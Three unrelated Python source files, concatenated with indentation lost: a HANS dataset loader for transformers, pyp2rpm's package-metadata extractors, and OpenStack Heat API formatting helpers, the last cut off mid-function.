logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class InputExample:
"""
A single training/test example for simple sequence classification.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
pairID: (Optional) string. Unique identifier for the pair of sentences.
"""
guid: str
text_a: str
text_b: Optional[str] = None
label: Optional[str] = None
pairID: Optional[str] = None
@dataclass(frozen=True)
class InputFeatures:
"""
A single set of features of data.
Property names are the same names as the corresponding inputs to a model.
Args:
input_ids: Indices of input sequence tokens in the vocabulary.
attention_mask: Mask to avoid performing attention on padding token indices.
Mask values selected in ``[0, 1]``:
Usually ``1`` for tokens that are NOT MASKED, ``0`` for MASKED (padded) tokens.
token_type_ids: (Optional) Segment token indices to indicate first and second
portions of the inputs. Only some models use them.
label: (Optional) Label corresponding to the input. Int for classification problems,
float for regression problems.
pairID: (Optional) Unique identifier for the pair of sentences.
"""
input_ids: List[int]
attention_mask: Optional[List[int]] = None
token_type_ids: Optional[List[int]] = None
label: Optional[Union[int, float]] = None
pairID: Optional[int] = None
if is_torch_available():
import torch
from torch.utils.data.dataset import Dataset
class HansDataset(Dataset):
"""
This will be superseded by a framework-agnostic approach
soon.
"""
features: List[InputFeatures]
def __init__(
self,
data_dir: str,
tokenizer: PreTrainedTokenizer,
task: str,
max_seq_length: Optional[int] = None,
overwrite_cache=False,
evaluate: bool = False,
):
processor = hans_processors[task]()
cached_features_file = os.path.join(
data_dir,
"cached_{}_{}_{}_{}".format(
"dev" if evaluate else "train",
tokenizer.__class__.__name__,
str(max_seq_length),
task,
),
)
label_list = processor.get_labels()
if tokenizer.__class__ in (
RobertaTokenizer,
RobertaTokenizerFast,
XLMRobertaTokenizer,
BartTokenizer,
BartTokenizerFast,
):
# HACK(label indices are swapped in RoBERTa pretrained model)
label_list[1], label_list[2] = label_list[2], label_list[1]
self.label_list = label_list
# Make sure only the first process in distributed training processes the dataset,
# and the others will use the cache.
lock_path = cached_features_file + ".lock"
with FileLock(lock_path):
if os.path.exists(cached_features_file) and not overwrite_cache:
logger.info(f"Loading features from cached file {cached_features_file}")
self.features = torch.load(cached_features_file)
else:
logger.info(f"Creating features from dataset file at {data_dir}")
examples = (
processor.get_dev_examples(data_dir) if evaluate else processor.get_train_examples(data_dir)
)
logger.info("Training examples: %s", len(examples))
self.features = hans_convert_examples_to_features(examples, label_list, max_seq_length, tokenizer)
logger.info("Saving features into cached file %s", cached_features_file)
torch.save(self.features, cached_features_file)
def __len__(self):
return len(self.features)
def __getitem__(self, i) -> InputFeatures:
return self.features[i]
def get_labels(self):
return self.label_list
if is_tf_available():
import tensorflow as tf
class TFHansDataset:
"""
This will be superseded by a framework-agnostic approach
soon.
"""
features: List[InputFeatures]
def __init__(
self,
data_dir: str,
tokenizer: PreTrainedTokenizer,
task: str,
max_seq_length: Optional[int] = 128,
overwrite_cache=False,
evaluate: bool = False,
):
processor = hans_processors[task]()
label_list = processor.get_labels()
if tokenizer.__class__ in (
RobertaTokenizer,
RobertaTokenizerFast,
XLMRobertaTokenizer,
BartTokenizer,
BartTokenizerFast,
):
# HACK(label indices are swapped in RoBERTa pretrained model)
label_list[1], label_list[2] = label_list[2], label_list[1]
self.label_list = label_list
examples = processor.get_dev_examples(data_dir) if evaluate else processor.get_train_examples(data_dir)
self.features = hans_convert_examples_to_features(examples, label_list, max_seq_length, tokenizer)
def gen():
for (ex_index, ex) in tqdm.tqdm(enumerate(self.features), desc="convert examples to features"):
if ex_index % 10000 == 0:
logger.info("Writing example %d of %d" % (ex_index, len(examples)))
yield (
{
"example_id": 0,
"input_ids": ex.input_ids,
"attention_mask": ex.attention_mask,
"token_type_ids": ex.token_type_ids,
},
ex.label,
)
self.dataset = tf.data.Dataset.from_generator(
gen,
(
{
"example_id": tf.int32,
"input_ids": tf.int32,
"attention_mask": tf.int32,
"token_type_ids": tf.int32,
},
tf.int64,
),
(
{
"example_id": tf.TensorShape([]),
"input_ids": tf.TensorShape([None, None]),
"attention_mask": tf.TensorShape([None, None]),
"token_type_ids": tf.TensorShape([None, None]),
},
tf.TensorShape([]),
),
)
def get_dataset(self):
return self.dataset
def __len__(self):
return len(self.features)
def __getitem__(self, i) -> InputFeatures:
return self.features[i]
def get_labels(self):
return self.label_list
class HansProcessor(DataProcessor):
"""Processor for the HANS data set."""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "heuristics_train_set.txt")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "heuristics_evaluation_set.txt")), "dev")
def get_labels(self):
"""See base class.
Note that we follow the standard three labels for MNLI
(see :class:`~transformers.data.processors.utils.MnliProcessor`)
but the HANS evaluation groups `contradiction` and `neutral` into `non-entailment` (label 0) while
`entailment` is label 1."""
return ["contradiction", "entailment", "neutral"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = "%s-%s" % (set_type, line[0])
text_a = line[5]
text_b = line[6]
pairID = line[7][2:] if line[7].startswith("ex") else line[7]
label = line[0]
examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, pairID=pairID))
return examples
def hans_convert_examples_to_features(
examples: List[InputExample],
label_list: List[str],
max_length: int,
tokenizer: PreTrainedTokenizer,
):
"""
Loads a data file into a list of ``InputFeatures``
Args:
examples: List of ``InputExamples`` containing the examples.
label_list: List of labels. Can be obtained from the processor using the ``processor.get_labels()`` method.
max_length: Maximum example length.
tokenizer: Instance of a tokenizer that will tokenize the examples.
Returns:
A list of task-specific ``InputFeatures`` which can be fed to the model.
"""
label_map = {label: i for i, label in enumerate(label_list)}
features = []
for (ex_index, example) in tqdm.tqdm(enumerate(examples), desc="convert examples to features"):
if ex_index % 10000 == 0:
logger.info("Writing example %d" % (ex_index))
inputs = tokenizer(
example.text_a,
example.text_b,
add_special_tokens=True,
max_length=max_length,
padding="max_length",
truncation=True,
return_overflowing_tokens=True,
)
label = label_map[example.label] if example.label in label_map else 0
pairID = int(example.pairID)
features.append(InputFeatures(**inputs, label=label, pairID=pairID))
for i, example in enumerate(examples[:5]):
logger.info("*** Example ***")
logger.info(f"guid: {example}")
logger.info(f"features: {features[i]}")
return features
hans_tasks_num_labels = {
"hans": 3,
}
hans_processors = {
"hans": HansProcessor,
}
| |
import logging
import os
import sys
import json
import re
import tempfile
import shutil
import glob
import textwrap
from abc import ABCMeta
try:
JSONDecodeError = json.decoder.JSONDecodeError
except AttributeError:
JSONDecodeError = ValueError
import pyp2rpm.exceptions as exc
import pyp2rpm.logger
from pyp2rpm import archive
from pyp2rpm.dependency_parser import (deps_from_pyp_format,
deps_from_pydit_json)
from pyp2rpm.package_data import PackageData
from pyp2rpm.package_getters import get_url
from pyp2rpm.module_runners import SubprocessModuleRunner
from pyp2rpm import settings
try:
from pyp2rpm import virtualenv
except ImportError:
virtualenv = None
logger = logging.getLogger(__name__)
def cut_to_length(text, length, delim):
"""Shorten given text on first delimiter after given number
of characters.
"""
cut = text.find(delim, length)
if cut > -1:
return text[:cut]
else:
return text
def get_interpreter_path(version=None):
"""Return the executable of a specified or current version."""
if version and version != str(sys.version_info[0]):
return settings.PYTHON_INTERPRETER + version
else:
return sys.executable
def license_from_trove(trove):
"""Finds out license from list of trove classifiers.
Args:
trove: list of trove classifiers
Returns:
Fedora name of the package license or empty string, if no licensing
information is found in trove classifiers.
"""
license = []
for classifier in trove:
if 'License' in classifier:
stripped = classifier.strip()
# if taken from EGG-INFO, begins with Classifier:
stripped = stripped[stripped.find('License'):]
if stripped in settings.TROVE_LICENSES:
license.append(settings.TROVE_LICENSES[stripped])
return ' and '.join(license)
def versions_from_trove(trove):
"""Finds out python version from list of trove classifiers.
Args:
trove: list of trove classifiers
Returns:
python version string
"""
versions = set()
for classifier in trove:
if 'Programming Language :: Python ::' in classifier:
ver = classifier.split('::')[-1]
major = ver.split('.')[0].strip()
if major:
versions.add(major)
return sorted(
set([v for v in versions if v.replace('.', '', 1).isdigit()]))
def pypi_metadata_extension(extraction_fce):
"""Extracts data from PyPI and merges them with data from extraction
method.
"""
def inner(self, client=None):
data = extraction_fce(self)
if client is None:
logger.warning("Client is None, it was probably disabled")
data.update_attr('source0', self.archive.name)
return data
try:
release_data = client.release_data(self.name, self.version)
except BaseException:
logger.warning("Some kind of error while communicating with "
"client: {0}.".format(client), exc_info=True)
return data
try:
url, md5_digest = get_url(client, self.name, self.version)
except exc.MissingUrlException:
url, md5_digest = ('FAILED TO EXTRACT FROM PYPI',
'FAILED TO EXTRACT FROM PYPI')
data_dict = {'source0': url, 'md5': md5_digest}
for data_field in settings.PYPI_USABLE_DATA:
data_dict[data_field] = release_data.get(data_field, '')
# we usually get better license representation from trove classifiers
data_dict["license"] = license_from_trove(release_data.get(
'classifiers', ''))
data.set_from(data_dict, update=True)
return data
return inner
def venv_metadata_extension(extraction_fce):
"""Extracts specific metadata from virtualenv object, merges them with data
from given extraction method.
"""
def inner(self):
data = extraction_fce(self)
if virtualenv is None or not self.venv:
logger.debug("Skipping virtualenv metadata extraction.")
return data
temp_dir = tempfile.mkdtemp()
try:
extractor = virtualenv.VirtualEnv(self.local_file,
temp_dir,
self.name_convertor,
self.base_python_version)
data.set_from(extractor.get_venv_data, update=True)
except exc.VirtualenvFailException as e:
logger.error("{}, skipping virtualenv metadata extraction.".format(
e))
finally:
shutil.rmtree(temp_dir)
return data
return inner
def process_description(description_fce):
"""Removes special character delimiters, titles
and wraps paragraphs.
"""
def inner(description):
clear_description = \
re.sub(r'\s+', ' ', # multiple whitespaces
# general URLs
re.sub(r'\w+:\/{2}[\d\w-]+(\.[\d\w-]+)*(?:(?:\/[^\s/]*))*', '',
# delimiters
re.sub('(#|=|---|~|`)*', '',
# very short lines, typically titles
re.sub('((\r?\n)|^).{0,8}((\r?\n)|$)', '',
# PyPI's version and downloads tags
re.sub(
'((\r*.. image::|:target:) https?|(:align:|:alt:))[^\n]*\n', '',
description_fce(description))))))
return ' '.join(textwrap.wrap(clear_description, 80))
return inner
class LocalMetadataExtractor(object):
"""Abstract base class for metadata extractors, does not provide
implementation of main method to extract data.
"""
__metaclass__ = ABCMeta
def __init__(self, local_file, name, name_convertor, version,
rpm_name=None, venv=True, distro=None,
base_python_version=None,
metadata_extension=False):
self.local_file = local_file
self.archive = archive.Archive(local_file)
self.name = name
self.name_convertor = name_convertor
self.version = version
self.rpm_name = rpm_name
self.venv = venv
self.distro = distro
self.base_python_version = base_python_version
self.metadata_extension = metadata_extension
self.unsupported_version = None
def name_convert_deps_list(self, deps_list):
for dep in deps_list:
dep[1] = self.name_convertor.rpm_name(
dep[1], self.base_python_version)
return deps_list
@property
def venv_extraction_disabled(self):
return virtualenv is None or not self.venv
@property
def versions_from_archive(self):
"""Return Python versions extracted from trove classifiers. """
py_vers = versions_from_trove(self.classifiers)
return [ver for ver in py_vers if ver != self.unsupported_version]
@property
def has_pth(self):
"""Figure out if package has pth file """
if self.venv_extraction_disabled:
return "." in self.name
else:
return None
@property
def has_extension(self):
"""Finds out whether the packages has binary extension.
Returns:
True if the package has a binary extension, False otherwise
"""
return self.archive.has_file_with_suffix(settings.EXTENSION_SUFFIXES)
@property
def has_test_files(self):
"""Check if the archive contains files, which can be collected
by pytest.
"""
return (self.archive.get_files_re('test_.*.py') +
self.archive.get_files_re('.*_test.py')) != []
@property
def srcname(self):
"""Return srcname for the macro if the pypi name should be changed.
Those cases are:
- name was provided with -r option
- pypi name is like python-<name>
"""
if self.rpm_name or self.name.startswith(('python-', 'Python-')):
return self.name_convertor.base_name(self.rpm_name or self.name)
@pypi_metadata_extension
@venv_metadata_extension
def extract_data(self):
"""Extracts data from archive.
Returns:
PackageData object containing the extracted data.
"""
data = PackageData(
local_file=self.local_file,
name=self.name,
pkg_name=self.rpm_name or self.name_convertor.rpm_name(
self.name, pkg_name=True),
version=self.version,
srcname=self.srcname)
with self.archive:
data.set_from(self.data_from_archive)
# for example nose has attribute `packages` but instead of name
# listing the pacakges is using function to find them, that makes
# data.packages an empty set if virtualenv is disabled
if self.venv_extraction_disabled and getattr(data, "packages") == []:
data.packages = [data.name]
return data
@staticmethod
def separate_license_files(doc_files):
other = [doc for doc in doc_files if all(s not in doc.lower() for s in
settings.LICENSE_FILES)]
licenses = [doc for doc in doc_files if any(s in doc.lower() for s in
settings.LICENSE_FILES)]
return other, licenses
@property
def data_from_archive(self):
"""Returns all metadata extractable from the archive.
Returns:
dictionary containing metadata extracted from the archive
"""
archive_data = {}
archive_data['runtime_deps'] = self.runtime_deps
archive_data['build_deps'] = [
['BuildRequires', 'python2-devel', '{name}']] + self.build_deps
archive_data['py_modules'] = self.py_modules
archive_data['scripts'] = self.scripts
archive_data['home_page'] = self.home_page
archive_data['description'] = self.description
archive_data['summary'] = self.summary
archive_data['license'] = self.license
archive_data['has_pth'] = self.has_pth
archive_data['has_extension'] = self.has_extension
archive_data['has_test_suite'] = self.has_test_suite
archive_data['python_versions'] = self.versions_from_archive
(archive_data['doc_files'],
archive_data['doc_license']) = self.separate_license_files(
self.doc_files)
archive_data['dirname'] = self.archive.top_directory
return archive_data
class SetupPyMetadataExtractor(LocalMetadataExtractor):
"""Class to extract metadata from setup.py using custom extract_dist
command.
"""
def __init__(self, *args, **kwargs):
super(SetupPyMetadataExtractor, self).__init__(*args, **kwargs)
temp_dir = tempfile.mkdtemp()
try:
with self.archive as package_archive:
package_archive.extract_all(directory=temp_dir)
self.metadata = self._get_metadata(temp_dir)
finally:
shutil.rmtree(temp_dir)
def _get_metadata(self, temp_dir):
runner = SubprocessModuleRunner(
self.get_setup_py(temp_dir),
*settings.EXTRACT_DIST_COMMAND_ARGS + ['--stdout'])
current_version = self.base_python_version or str(sys.version_info[0])
# the version provided with `-b` option or default
paths_to_attempt = (get_interpreter_path(version=ver) for ver in (
current_version,
'2' if current_version == '3' else '3' # alternative Python version
))
for path in paths_to_attempt:
try:
logger.info("Running extract_dist command with: {0}".format(
path))
runner.run(path)
return runner.results
except (JSONDecodeError, exc.ExtractionError) as e:
logger.error("Could not extract metadata with: {0}".format(
path))
if all(hasattr(e, a) for a in ('msg', 'pos', 'doc')):
logger.error("Could not parse JSON: {0} at {1}".format(
e.msg, e.pos))
logger.error("The JSON was: {0}".format(e.doc))
self.unsupported_version = current_version
else:
sys.stderr.write("Failed to extract data from setup.py script.\n")
sys.stderr.write("Check the log for details: {0}\n".format(
', '.join(pyp2rpm.logger.destinations)))
raise SystemExit(3)
def get_setup_py(self, directory):
try:
return glob.glob("{0}/{1}*/setup.py".format(
directory, self.archive.top_directory or self.name))[0]
except IndexError:
sys.stderr.write(
"setup.py not found, maybe {} is not "
"proper source archive.\n".format(self.local_file))
raise SystemExit(3)
@property
def runtime_deps(self): # install_requires
"""Returns list of runtime dependencies of the package specified in
setup.py.
Dependencies are in RPM SPECFILE format - see dependency_to_rpm()
for details, but names are already transformed according to
current distro.
Returns:
list of runtime dependencies of the package
"""
use_rich_deps = self.distro not in settings.RPM_RICH_DEP_BLACKLIST
install_requires = self.metadata['install_requires']
if self.metadata[
'entry_points'] and 'setuptools' not in install_requires:
install_requires.append('setuptools') # entrypoints
return sorted(self.name_convert_deps_list(deps_from_pyp_format(
install_requires, runtime=True, use_rich_deps=use_rich_deps)))
@property
def build_deps(self): # setup_requires [tests_require, install_requires]
"""Same as runtime_deps, but build dependencies. Test and install
requires are included if package contains test suite to prevent
%check phase crashes because of missing dependencies
Returns:
list of build dependencies of the package
"""
use_rich_deps = self.distro not in settings.RPM_RICH_DEP_BLACKLIST
build_requires = self.metadata['setup_requires']
if self.has_test_suite:
build_requires += self.metadata['tests_require'] + self.metadata[
'install_requires']
if 'setuptools' not in build_requires:
build_requires.append('setuptools')
return sorted(self.name_convert_deps_list(deps_from_pyp_format(
build_requires, runtime=False, use_rich_deps=use_rich_deps)))
@property
def has_packages(self):
return self.metadata['packages'] != set()
@property
def packages(self):
if self.has_packages:
packages = [package.split('.', 1)[0]
for package in self.metadata['packages']]
return sorted(set(packages))
@property
def py_modules(self):
try:
return sorted(set(self.metadata['py_modules']))
except TypeError:
return []
@property
def scripts(self):
transformed = []
if self.metadata['entry_points']:
scripts = self.metadata['entry_points'].get('console_scripts', [])
# handle the case for 'console_scripts' = [ 'a = b' ]
for script in scripts:
equal_sign = script.find('=')
if equal_sign == -1:
transformed.append(script)
else:
transformed.append(script[0:equal_sign].strip())
transformed += self.metadata['scripts']
return sorted([os.path.basename(t) for t in set(transformed)])
@property
def home_page(self):
return self.metadata['url']
@property
@process_description
def description(self):
return cut_to_length(self.metadata['long_description'],
80 * 8, '\n')
@property
@process_description
def summary(self):
return cut_to_length(self.metadata['description'].split('\n')[0],
50, '.')
@property
def classifiers(self):
return self.metadata['classifiers']
@property
def license(self):
return self.metadata['license']
@property
def has_bundled_egg_info(self):
"""Finds out if there is a bundled .egg-info dir in the archive.
Returns:
True if the archive contains bundled .egg-info directory,
False otherwise
"""
return self.archive.has_file_with_suffix('.egg-info')
@property
def has_test_suite(self):
"""Finds out whether the package contains setup.py test suite.
Returns:
True if the package contains setup.py test suite, False otherwise
"""
return (self.has_test_files or self.metadata['test_suite'] or
self.metadata['tests_require'] != [])
@property
def doc_files(self):
"""Returns list of doc files that should be used for %doc in specfile.
Returns:
List of doc files from the archive - only basenames, not full
paths.
"""
doc_files = []
for doc_file_re in settings.DOC_FILES_RE:
doc_files.extend(
self.archive.get_files_re(doc_file_re, ignorecase=True))
return ['/'.join(x.split('/')[1:]) for x in doc_files]
@property
def sphinx_dir(self):
"""Returns directory with sphinx documentation, if there is such.
Returns:
Full path to sphinx documentation dir inside the archive, or None
if there is no such.
"""
# search for sphinx dir doc/ or docs/ under the first directory in
# archive (e.g. spam-1.0.0/doc)
candidate_dirs = self.archive.get_directories_re(
settings.SPHINX_DIR_RE, full_path=True)
# search for conf.py in the dirs (TODO: what if more are found?)
for directory in candidate_dirs:
contains_conf_py = self.archive.get_files_re(
r'{0}/conf.py$'.format(re.escape(directory)), full_path=True)
in_tests = 'tests' in directory.split(os.sep)
if contains_conf_py and not in_tests:
return directory
@property
def data_from_archive(self):
"""Appends setup.py specific metadata to archive_data."""
archive_data = super(SetupPyMetadataExtractor, self).data_from_archive
archive_data['has_packages'] = self.has_packages
archive_data['packages'] = self.packages
archive_data['has_bundled_egg_info'] = self.has_bundled_egg_info
sphinx_dir = self.sphinx_dir
if sphinx_dir:
archive_data['sphinx_dir'] = "/".join(sphinx_dir.split("/")[1:])
archive_data['build_deps'].append(
['BuildRequires', self.name_convertor.rpm_name(
"sphinx", self.base_python_version), '{name}'])
return archive_data
class WheelMetadataExtractor(LocalMetadataExtractor):
"""Class to extract metadata from wheel archive"""
@property
def json_metadata(self):
if not hasattr(self, '_json_metadata'):
self._json_metadata = self.archive.json_wheel_metadata
return self._json_metadata
def get_requires(self, requires_types):
"""Extracts requires of given types from metadata file, filter windows
specific requires.
"""
if not isinstance(requires_types, list):
requires_types = list(requires_types)
extracted_requires = []
for requires_name in requires_types:
for requires in self.json_metadata.get(requires_name, []):
if 'win' in requires.get('environment', {}):
continue
extracted_requires.extend(requires['requires'])
return extracted_requires
@property
def runtime_deps(self):
run_requires = self.get_requires(['run_requires', 'meta_requires'])
if 'setuptools' not in run_requires:
run_requires.append('setuptools')
return self.name_convert_deps_list(deps_from_pydit_json(run_requires))
@property
def build_deps(self):
build_requires = self.get_requires(['build_requires'])
if self.has_test_suite:
build_requires += self.get_requires([
'test_requires', 'run_requires'])
if 'setuptools' not in build_requires:
build_requires.append('setuptools')
return self.name_convert_deps_list(deps_from_pydit_json(
build_requires, runtime=False))
@property
def py_modules(self):
return self.archive.record.get('modules')
@property
def scripts(self):
return self.archive.record.get('scripts', [])
@property
def home_page(self):
urls = [url for url in self.json_metadata.get('extensions', {})
.get('python.details', {})
.get('project_urls', {}).values()]
if urls:
return urls[0]
@property
@process_description
def description(self):
return self.archive.wheel_description()
@property
def summary(self):
return self.json_metadata.get('summary', None)
@property
def classifiers(self):
return self.json_metadata.get('classifiers', [])
@property
def license(self):
return self.json_metadata.get('license', None)
@property
def has_test_suite(self):
return self.has_test_files or self.json_metadata.get(
'test_requires', False) is not False
@property
def doc_files(self):
return (self.json_metadata.get('extensions', {})
.get('python.details', {})
.get('document_names', {})
.values())
| |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from oslo_log import log as logging
from oslo_utils import timeutils
import six
from heat.common.i18n import _
from heat.common.i18n import _LE
from heat.common import param_utils
from heat.common import template_format
from heat.engine import constraints as constr
from heat.rpc import api as rpc_api
LOG = logging.getLogger(__name__)
def extract_args(params):
"""Extract arguments passed as parameters and return them as a dictionary.
Extract any arguments passed as parameters through the API and return them
as a dictionary. This allows us to filter the passed args and do type
conversion where appropriate
"""
kwargs = {}
timeout_mins = params.get(rpc_api.PARAM_TIMEOUT)
if timeout_mins not in ('0', 0, None):
try:
timeout = int(timeout_mins)
except (ValueError, TypeError):
LOG.exception(_LE('Timeout conversion failed'))
else:
if timeout > 0:
kwargs[rpc_api.PARAM_TIMEOUT] = timeout
else:
raise ValueError(_('Invalid timeout value %s') % timeout)
name = rpc_api.PARAM_DISABLE_ROLLBACK
if name in params:
disable_rollback = param_utils.extract_bool(name, params[name])
kwargs[name] = disable_rollback
name = rpc_api.PARAM_SHOW_DELETED
if name in params:
params[name] = param_utils.extract_bool(name, params[name])
adopt_data = params.get(rpc_api.PARAM_ADOPT_STACK_DATA)
if adopt_data:
try:
adopt_data = template_format.simple_parse(adopt_data)
except ValueError as exc:
raise ValueError(_('Invalid adopt data: %s') % exc)
kwargs[rpc_api.PARAM_ADOPT_STACK_DATA] = adopt_data
tags = params.get(rpc_api.PARAM_TAGS)
if tags:
if not isinstance(tags, list):
raise ValueError(_('Invalid tags, not a list: %s') % tags)
for tag in tags:
if not isinstance(tag, six.string_types):
raise ValueError(_('Invalid tag, "%s" is not a string') % tag)
if len(tag) > 80:
raise ValueError(_('Invalid tag, "%s" is longer than 80 '
'characters') % tag)
# Comma is not allowed as per the API WG tagging guidelines
if ',' in tag:
raise ValueError(_('Invalid tag, "%s" contains a comma') % tag)
kwargs[rpc_api.PARAM_TAGS] = tags
return kwargs
def _parse_object_status(status):
"""Parse input status into action and status if possible.
This function parses a given string (or list of strings) and see if it
contains the action part. The action part is exacted if found.
:param status: A string or a list of strings where each string contains
a status to be checked.
:returns: (actions, statuses) tuple, where actions is a set of actions
extracted from the input status and statuses is a set of pure
object status.
"""
if not isinstance(status, list):
status = [status]
status_set = set()
action_set = set()
for val in status:
# Note: cannot reference Stack.STATUSES due to circular reference issue
for s in ('COMPLETE', 'FAILED', 'IN_PROGRESS'):
index = val.rfind(s)
if index != -1:
status_set.add(val[index:])
if index > 1:
action_set.add(val[:index - 1])
break
return action_set, status_set
def translate_filters(params):
"""Translate filter names to their corresponding DB field names.
:param params: A dictionary containing keys from engine.api.STACK_KEYS
and other keys previously leaked to users.
:returns: A dict containing only valid DB filed names.
"""
key_map = {
rpc_api.STACK_NAME: 'name',
rpc_api.STACK_ACTION: 'action',
rpc_api.STACK_STATUS: 'status',
rpc_api.STACK_STATUS_DATA: 'status_reason',
rpc_api.STACK_DISABLE_ROLLBACK: 'disable_rollback',
rpc_api.STACK_TIMEOUT: 'timeout',
rpc_api.STACK_OWNER: 'username',
rpc_api.STACK_PARENT: 'owner_id',
rpc_api.STACK_USER_PROJECT_ID: 'stack_user_project_id',
}
for key, field in key_map.items():
value = params.pop(key, None)
if not value:
continue
fld_value = params.get(field, None)
if fld_value:
if not isinstance(fld_value, list):
fld_value = [fld_value]
if not isinstance(value, list):
value = [value]
value.extend(fld_value)
params[field] = value
# Deal with status which might be of form <ACTION>_<STATUS>, e.g.
# "CREATE_FAILED". Note this logic is still not ideal due to the fact
# that action and status are stored separately.
if 'status' in params:
a_set, s_set = _parse_object_status(params['status'])
statuses = sorted(s_set)
params['status'] = statuses[0] if len(statuses) == 1 else statuses
if a_set:
a = params.get('action', [])
action_set = set(a) if isinstance(a, list) else set([a])
actions = sorted(action_set.union(a_set))
params['action'] = actions[0] if len(actions) == 1 else actions
return params
def format_stack_outputs(stack, outputs):
"""Return a representation of the given output template.
Return a representation of the given output template for the given stack
that matches the API output expectations.
"""
def format_stack_output(k):
output = {
rpc_api.OUTPUT_DESCRIPTION: outputs[k].get('Description',
'No description given'),
rpc_api.OUTPUT_KEY: k,
rpc_api.OUTPUT_VALUE: stack.output(k)
}
if outputs[k].get('error_msg'):
output.update({rpc_api.OUTPUT_ERROR: outputs[k].get('error_msg')})
return output
return [format_stack_output(key) for key in outputs]
def format_stack(stack, preview=False):
"""Return a representation of the given stack.
Return a representation of the given stack that matches the API output
expectations.
"""
updated_time = stack.updated_time and stack.updated_time.isoformat()
created_time = stack.created_time or timeutils.utcnow()
info = {
rpc_api.STACK_NAME: stack.name,
rpc_api.STACK_ID: dict(stack.identifier()),
rpc_api.STACK_CREATION_TIME: created_time.isoformat(),
rpc_api.STACK_UPDATED_TIME: updated_time,
rpc_api.STACK_NOTIFICATION_TOPICS: [], # TODO(?) Not implemented yet
rpc_api.STACK_PARAMETERS: stack.parameters.map(str),
rpc_api.STACK_DESCRIPTION: stack.t[stack.t.DESCRIPTION],
rpc_api.STACK_TMPL_DESCRIPTION: stack.t[stack.t.DESCRIPTION],
rpc_api.STACK_CAPABILITIES: [], # TODO(?) Not implemented yet
rpc_api.STACK_DISABLE_ROLLBACK: stack.disable_rollback,
rpc_api.STACK_TIMEOUT: stack.timeout_mins,
rpc_api.STACK_OWNER: stack.username,
rpc_api.STACK_PARENT: stack.owner_id,
rpc_api.STACK_USER_PROJECT_ID: stack.stack_user_project_id,
rpc_api.STACK_TAGS: stack.tags,
}
if not preview:
update_info = {
rpc_api.STACK_ACTION: stack.action or '',
rpc_api.STACK_STATUS: stack.status or '',
rpc_api.STACK_STATUS_DATA: stack.status_reason,
}
info.update(update_info)
# allow users to view the outputs of stacks
if stack.action != stack.DELETE and stack.status != stack.IN_PROGRESS:
info[rpc_api.STACK_OUTPUTS] = format_stack_outputs(stack,
stack.outputs)
return info
def format_resource_attributes(resource, with_attr=None):
resolver = resource.attributes
if not with_attr:
with_attr = []
def resolve(attr, resolver):
try:
return resolver._resolver(attr)
except Exception:
return None
# if 'show' in attribute_schema, will resolve all attributes of resource
# including the ones are not represented in response of show API, such as
# 'console_urls' for nova server, user can view it by taking with_attr
# parameter
if 'show' in six.iterkeys(resolver):
show_attr = resolve('show', resolver)
# check if 'show' resolved to dictionary. so it's not None
if isinstance(show_attr, collections.Mapping):
for a in with_attr:
if a not in show_attr:
show_attr[a] = resolve(a, resolver)
return show_attr
else:
# remove 'show' attribute if it's None or not a mapping
# then resolve all attributes manually
del resolver._attributes['show']
attributes = set(list(six.iterkeys(resolver)) + with_attr)
return dict((attr, resolve(attr, resolver))
for attr in attributes)
def format_resource_properties(resource):
def get_property(prop):
try:
return resource.properties[prop]
except (KeyError, ValueError):
return None
return dict((prop, get_property(prop))
for prop in six.iterkeys(resource.properties_schema))
def format_stack_resource(resource, detail=True, with_props=False,
with_attr=None):
"""Return a representation of the given resource.
Return a representation of the given resource that matches the API output
expectations.
"""
created_time = resource.created_time and resource.created_time.isoformat()
last_updated_time = (resource.updated_time and
resource.updated_time.isoformat()) or created_time
res = {
rpc_api.RES_UPDATED_TIME: last_updated_time,
rpc_api.RES_CREATION_TIME: created_time,
rpc_api.RES_NAME: resource.name,
rpc_api.RES_PHYSICAL_ID: resource.resource_id or '',
rpc_api.RES_ACTION: resource.action,
rpc_api.RES_STATUS: resource.status,
rpc_api.RES_STATUS_DATA: resource.status_reason,
rpc_api.RES_TYPE: resource.type(),
rpc_api.RES_ID: dict(resource.identifier()),
rpc_api.RES_STACK_ID: dict(resource.stack.identifier()),
rpc_api.RES_STACK_NAME: resource.stack.name,
rpc_api.RES_REQUIRED_BY: resource.required_by(),
}
if resource.has_nested():
res[rpc_api.RES_NESTED_STACK_ID] = dict(
resource.nested().identifier())
if resource.stack.parent_resource_name:
res[rpc_api.RES_PARENT_RESOURCE] = resource.stack.parent_resource_name
if detail:
res[rpc_api.RES_DESCRIPTION] = resource.t.description
res[rpc_api.RES_METADATA] = resource.metadata_get()
res[rpc_api.RES_SCHEMA_ATTRIBUTES] = format_resource_attributes(
resource, with_attr)
if with_props:
res[rpc_api.RES_SCHEMA_PROPERTIES] = format_resource_properties(
resource)
return res
def format_stack_preview(stack):
def format_resource(res):
if isinstance(res, list):
return map(format_resource, res)
return format_stack_resource(res, with_props=True)
fmt_stack = format_stack(stack, preview=True)
fmt_resources = list(map(format_resource, stack.preview_resources()))
fmt_stack['resources'] = fmt_resources
return fmt_stack
def format_event(event):
stack_identifier = event.stack.identifier()
event_timestamp = event.timestamp or timeutils.utcnow()
result = {
rpc_api.EVENT_ID: dict(event.identifier()),
rpc_api.EVENT_STACK_ID: dict(stack_identifier),
rpc_api.EVENT_STACK_NAME: stack_identifier.stack_name,
rpc_api.EVENT_TIMESTAMP: event_timestamp.isoformat(),
rpc_api.EVENT_RES_NAME: event.resource_name,
rpc_api.EVENT_RES_PHYSICAL_ID: event.physical_resource_id,
